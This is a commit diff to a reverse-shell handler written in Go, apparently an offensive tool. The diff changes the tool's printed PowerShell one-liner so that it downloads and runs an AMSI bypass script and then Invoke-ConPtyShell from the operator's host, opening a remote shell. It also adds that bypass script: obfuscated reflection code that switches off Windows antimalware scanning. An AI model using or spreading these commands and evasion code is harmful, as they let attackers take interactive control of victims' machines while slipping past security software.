use amsi-bypass

src/sessions/sessions.go

@@ -107,7 +107,7 @@ func SetOnlyWebserver(onlyWebserverString string) {
 		PrintOnlyWebserverOptions()
 		// If OnlyWebServer is enable we print the oneliner
 		if onlyWebserver {
-			log.Info("connect with: powershell IEX(IWR http://yourip:" + strconv.Itoa(OptionsSession.Port) + "/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell yourIP " + strconv.Itoa(OptionsSession.Port))
+			log.Info("connect with: powershell IEX(IWR http://yourip:" + strconv.Itoa(OptionsSession.Port) + "/amsi-bypass.ps1);IEX(IWR http://yourip:" + strconv.Itoa(OptionsSession.Port) + "/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell yourIP " + strconv.Itoa(OptionsSession.Port))
 		}
 		Restart()
 	} else {

src/static/amsi-bypass.ps1

@@ -0,0 +1,2 @@
+#Matt Graebers Reflection method with WMF5 autologging bypass 
+[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.BindingFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType($([ChAR]([bytE]0x53)+[CHAr]([Byte]0x79)+[cHaR](8165/71)+[ChAR](116)+[ChAr](5353/53)+[cHar](10+99)+[CHAr](1242/27)+[CHAr]([bYTE]0x54)+[CHaR](9801/81)+[CHaR](94+18)+[chAr](176-75)))), [Object]([Ref].Assembly.GetType("System.Management.Automation.$([cHaR](975/15)+[cHAr](45+64)+[ChAr]([byTE]0x73)+[chaR](7035/67)+[ChaR](85)+[CHAR](88+28)+[ChAr]([BYTE]0x69)+[cHAr](108)+[cHar](115))")),('GetField')).Invoke(''+$([cHAr]([bYtE]0x61)+[ChaR]([bYTe]0x6D)+[CHar]([bYTE]0x73)+[char]([BYTe]0x69)+[char](4307/59)+[chaR](31+79)+[chAR](1785/17)+[ChAR](168-52)+[chAr](123-53)+[char]([ByTe]0x61)+[cHaR](105)+[ChAR]([Byte]0x6C)+[cHAr]([BYtE]0x65)+[char]([bYte]0x64))+'',(("NonPublic,Static") -as [String].Assembly.GetType('System.Reflection.BindingFlags'))).SetValue($null,$True);